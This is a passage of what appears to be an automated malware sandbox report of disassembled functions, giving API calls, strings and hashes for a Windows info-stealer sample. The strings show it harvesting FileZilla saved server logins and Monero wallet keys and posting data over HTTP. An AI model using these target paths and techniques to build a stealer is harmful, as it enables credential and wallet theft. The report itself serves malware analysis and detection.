                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21471af7597cdbac20b832b030e940f02cc14cd5be20e817dc4f56631d426da3
                          • Instruction ID: b097a16cd6b7626380d5341592b0284d2934699109ef9c3c88a87231647769a4
                          • Opcode Fuzzy Hash: 21471af7597cdbac20b832b030e940f02cc14cd5be20e817dc4f56631d426da3
                          • Instruction Fuzzy Hash: 3E2105B240C704EFD759BF29D8866AAFBE4EF58710F02482DE6D583650EB31A450CB87
                          Function 00399750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00390250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,003A0DBA,003A0DB7,003A0DB6,003A0DB3), ref: 00390362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00390369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00390385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 003903CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 003903DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00390419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00390463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00390562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00390571
                          • lstrcat.KERNEL32(?,url: ), ref: 00390580
                          • lstrcat.KERNEL32(?,00000000), ref: 00390593
                          • lstrcat.KERNEL32(?,003A1678), ref: 003905A2
                          • lstrcat.KERNEL32(?,00000000), ref: 003905B5
                          • lstrcat.KERNEL32(?,003A167C), ref: 003905C4
                          • lstrcat.KERNEL32(?,login: ), ref: 003905D3
                          • lstrcat.KERNEL32(?,00000000), ref: 003905E6
                          • lstrcat.KERNEL32(?,003A1688), ref: 003905F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00390604
                          • lstrcat.KERNEL32(?,00000000), ref: 00390617
                          • lstrcat.KERNEL32(?,003A1698), ref: 00390626
                          • lstrcat.KERNEL32(?,003A169C), ref: 00390635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 4878d69a3dc944da5033a94e811daeabe1e7f714640c979e261586454f72fc96
                          • Instruction ID: a675b7d6eb5ca964119c59deb12c0e28e2475d838f07d6a4316e569390cd4ca6
                          • Opcode Fuzzy Hash: 4878d69a3dc944da5033a94e811daeabe1e7f714640c979e261586454f72fc96
                          • Instruction Fuzzy Hash: 7CD13D72910608AFDF06EBE4DD96EEE7778EF15300F404518F502BA091DF74AA0ADBA1
                          Function 00385960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003859F8
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00385A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00385B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E3EA98,00000000,?,00E3A4B0,00000000,?,003A1A1C), ref: 00385E71
                          • lstrlen.KERNEL32(00000000), ref: 00385E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00385E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00385E9A
                          • lstrlen.KERNEL32(00000000), ref: 00385EAF
                          • lstrlen.KERNEL32(00000000), ref: 00385ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00385EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00385F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00385F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00385F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00385FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00385FBD
                          • HttpOpenRequestA.WININET(00000000,00E3EA58,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00385BF8
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • InternetCloseHandle.WININET(00000000), ref: 00385FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------$8$X
                          • API String ID: 874700897-1993953560
                          • Opcode ID: d8a23c89ca81b3b93fb8450fa8c98e488846a280cff1c1f8da5a65cf1c488b7e
                          • Instruction ID: e91796b22bdf9f3c62f2f34ef905ec35b1b8af46608005375ee9fcca32ae0383
                          • Opcode Fuzzy Hash: d8a23c89ca81b3b93fb8450fa8c98e488846a280cff1c1f8da5a65cf1c488b7e
                          • Instruction Fuzzy Hash: 1712F171820528ABDF16EBA0DC95FEEB778BF14700F504299F10A66091EF702A49DFA5
                          Function 0038CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0038D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0038D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D208
                          • lstrcat.KERNEL32(?,003A1478), ref: 0038D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D22A
                          • lstrcat.KERNEL32(?,003A147C), ref: 0038D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D24C
                          • lstrcat.KERNEL32(?,003A1480), ref: 0038D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D26E
                          • lstrcat.KERNEL32(?,003A1484), ref: 0038D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D290
                          • lstrcat.KERNEL32(?,003A1488), ref: 0038D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D2B2
                          • lstrcat.KERNEL32(?,003A148C), ref: 0038D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D2D4
                          • lstrcat.KERNEL32(?,003A1490), ref: 0038D2E3
                            • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                            • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                          • lstrlen.KERNEL32(?), ref: 0038D32A
                          • lstrlen.KERNEL32(?), ref: 0038D339
                            • Part of subcall function 0039AA70: StrCmpCA.SHLWAPI(00E39038,0038A7A7,?,0038A7A7,00E39038), ref: 0039AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0038D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                          • Instruction ID: 57da89655aa0ababfb5db5da74ec57371d1a6649ca0afadb32593545044f7eda
                          • Opcode Fuzzy Hash: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                          • Instruction Fuzzy Hash: 08E11F71910518AFCF06EBA0DD96EEE7778BF24305F104258F106BA091DF35AE09DBA2
                          Function 00398320 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • RegOpenKeyExA.ADVAPI32(00000000,00E3B648,00000000,00020019,00000000,003A05B6), ref: 003983A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                          • wsprintfA.USER32 ref: 00398459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?$@$P
                          • API String ID: 3246050789-3997378294
                          • Opcode ID: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                          • Instruction ID: b8eda88b2d5f85d38733ddd5ca4848b362f4c748ae964b407b8f8b58f20f80f7
                          • Opcode Fuzzy Hash: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                          • Instruction Fuzzy Hash: 2381F97191051CABEB29DB60CD95FEAB7B8FF58704F008298E109A6140DF716A89CFE1
                          Function 0038C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E3CEE8,00000000,?,003A144C,00000000,?,?), ref: 0038CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0038CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0038CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0038CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0038CAD9
                          • StrStrA.SHLWAPI(?,00E3D080,003A0B52), ref: 0038CAF7
                          • StrStrA.SHLWAPI(00000000,00E3CF30), ref: 0038CB1E
                          • StrStrA.SHLWAPI(?,00E3D9A0,00000000,?,003A1458,00000000,?,00000000,00000000,?,00E38FC8,00000000,?,003A1454,00000000,?), ref: 0038CCA2
                          • StrStrA.SHLWAPI(00000000,00E3D960), ref: 0038CCB9
                            • Part of subcall function 0038C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                            • Part of subcall function 0038C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                          • StrStrA.SHLWAPI(?,00E3D960,00000000,?,003A145C,00000000,?,00000000,00E39028), ref: 0038CD5A
                          • StrStrA.SHLWAPI(00000000,00E39138), ref: 0038CD71
                            • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                            • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                            • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                          • lstrlen.KERNEL32(00000000), ref: 0038CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0038CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                          • Instruction ID: 7dd43e767064e1c80c8013c557f8a26ca7a028b7bcd8e73447b1425395b13a2d
                          • Opcode Fuzzy Hash: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                          • Instruction Fuzzy Hash: FAE1FF71910518AFDF16EBA4DC95FEEBB78BF14300F404259F1066B191EF306A4ADBA2
                          Function 003912D0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 310COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
